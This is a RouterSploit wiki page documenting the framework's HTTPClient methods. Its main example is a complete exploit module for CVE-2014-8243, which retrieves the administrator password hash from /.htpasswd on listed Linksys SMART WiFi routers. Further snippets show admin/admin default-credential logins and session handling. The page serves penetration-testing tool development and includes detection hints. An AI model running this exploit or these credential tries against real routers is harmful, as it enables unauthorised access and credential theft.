
HTTP Client

Marcin Bury edited this page Oct 12, 2018 · 5 revisions

HTTP Client

Example exploit that utilises HTTP communication as a client

import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


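class Exploit(HTTPClient):
    """RouterSploit module for CVE-2014-8243 (Linksys SMART WiFi password disclosure).

    ``check()`` and ``run()`` both send ``GET /.htpasswd`` and pass no
    credentials to ``http_request``. A target counts as vulnerable when the
    response has status 200 and its body starts with a ``user:$N$``
    htpasswd-style entry. The ``devices`` tuple names each model together
    with the firmware build below which it is listed as affected.

    The only traffic the module produces is that ``GET /.htpasswd`` request
    (once from ``check()`` and, if that succeeds, once more from ``run()``),
    so that is the request to look for in HTTP logs or network captures.
    """

    __info__ = {
        "name": "Linksys SMART WiFi Password Disclosure",
        "description": "Exploit implementation for Linksys SMART WiFi Password Disclosure vulnerability. "
                       "If target is vulnerable administrator's MD5 passsword is retrieved.",
        "authors": (
            "Sijmen Ruwhof",  # vulnerability discovery
            "0BuRner",  # routersploit module
        ),
        "references": (
            "https://www.kb.cert.org/vuls/id/447516",
            "http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers",
            "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8243",
            "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8243",
        ),
        "devices": (
            "Linksys EA2700 < Ver.1.1.40 (Build 162751)",
            "Linksys EA3500 < Ver.1.1.40 (Build 162464)",
            "Linksys E4200v2 < Ver.2.1.41 (Build 162351)",
            "Linksys EA4500 < Ver.2.1.41 (Build 162351)",
            "Linksys EA6200 < Ver.1.1.41 (Build 162599)",
            "Linksys EA6300 < Ver.1.1.40 (Build 160989)",
            "Linksys EA6400 < Ver.1.1.40 (Build 160989)",
            "Linksys EA6500 < Ver.1.1.40 (Build 160989)",
            "Linksys EA6700 < Ver.1.1.40 (Build 160989)",
            "Linksys EA6900 < Ver.1.1.42 (Build 161129)",
        ),
    }

    # Module options exposed to the operator; the first argument is the default value.
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        """Probe the target and, if it looks vulnerable, print the retrieved file.

        Nothing is returned; every outcome is reported through the printer
        helpers (success, connection error, or not vulnerable).
        """
        if self.check():
            print_success("Target seems to be vulnerable")

            # check() only returns a bool, so the file is requested a second time here.
            response = self.http_request(
                method="GET",
                path="/.htpasswd"
            )
            # None is treated as a connection error; the status code of this
            # second response is not re-checked.
            if response is None:
                print_error("Exploit failed - connection error")
                return

            print_info("Unix crypt hash: $id$salt$hashed")  # See more at http://man7.org/linux/man-pages/man3/crypt.3.html
            print_success("Hash found:", response.text)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    # NOTE(review): @mute presumably silences printer output during the probe;
    # confirm against routersploit.core.exploit.
    @mute
    def check(self):
        """Return True when ``/.htpasswd`` is served and looks like a password file.

        Returns:
            bool: True if the response has status 200 and its body begins with
            ``<alphanumeric user>:$<digit>$``; False when no response was
            obtained, on any other status, or when the body does not match.
        """
        response = self.http_request(
            method="GET",
            path="/.htpasswd"
        )

        if response is not None and response.status_code == 200:
            # Raw string: "\$" is not a valid escape in an ordinary literal and
            # raises an invalid-escape warning on current Python versions.
            # "^" without re.MULTILINE anchors at the start of the body only,
            # so just the first entry of the file is inspected.
            if re.findall(r"^([a-zA-Z0-9]+:\$[0-9]\$)", response.text):
                return True

        return False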

HTTPClient methods

HTTPClient.http_request

Params

| Param | Type | Description | Required |
|---|---|---|---|
| method | str | method that should be issued e.g. GET, POST | yes |
| path | str | path to the resource that should be requested | yes |
| session | requests | session manager that should be used | no, default=requests |
| kwargs | any | kwargs arguments passed to request method | no |

Returns

| Type | Description |
|---|---|
| Response | Response object (the example module on this page treats `None` as a connection error) |

Examples

Retrieving data with GET

# Plain GET: only the two required arguments are supplied.
response = self.http_request(method="GET", path="/config.cgi")

# NOTE(review): if this is a requests Response, it is falsy for 4xx/5xx
# statuses as well as when no response came back (confirm).
if response:
    body = response.text
    print_info(body)

Sending data with POST

# Form fields for the request body; they are forwarded through the extra
# keyword arguments (data=...).
form_fields = {"login": "admin", "password": "admin"}

response = self.http_request(method="POST", path="/login.cgi", data=form_fields)

# Success is judged by a marker string in the returned page.
if response and "login successful" in response.text:
    print_success("Successful authentication!")

Adding Headers

headers = {
    "Content-Type": "text/xml",
    "X-Requested-With": "XMLHttpRequest",
}
data = "<test>TEST</test>"

response = self.http_request(
    method="POST",
    path="/xml.cgi",
    headers=headers,
    data=data,
)

if response:
    print_info(response.text)

Basic Authorization

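# HTTP Basic credentials are supplied through the extra keyword arguments (auth=...).
response = self.http_request(
    method="GET",
    path="/config.cgi",
    auth=("admin", "admin"),
)

# A 200 status is taken to mean the credentials were accepted.
# print_success is the success printer used by the example module on this page.
if response and response.status_code == 200:
    print_success("Successful authorization with admin/admin")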

Maintaining session (handling cookies)

# One Session object is passed to http_request so cookies set by the
# response are kept on it. This needs `requests` imported in the module.
session = requests.Session()

login_form = {"login": "admin", "password": "admin"}

response = self.http_request(
    method="POST",
    path="/auth.php",
    session=session,
    data=login_form,
)

if response:
    print_info("All the response cookies are correctly processed and maintained")

HTTPClient.get_target_url

Params

| Param | Type | Description | Required |
|---|---|---|---|
| path | str | path to HTTP server resource | no, default="" |

Returns

| Type | Description |
|---|---|
| str | full target URL with the correct scheme: http/https |

Example

# Build the absolute URL for a path on the configured target, then report it.
login_url = self.get_target_url(path="/cgi-bin/chklogin.cgi")
message = "Please login at: {}".format(login_url)
print_info(message)

HTTPClient.http_test_connect

Params

  • None

Returns

| Type | Description |
|---|---|
| bool | True if test connection was successful, False otherwise |

Example

# http_test_connect() takes no arguments and reports reachability as a bool.
is_listening = self.http_test_connect()
if is_listening:
    print_status("Remote HTTP server is listening")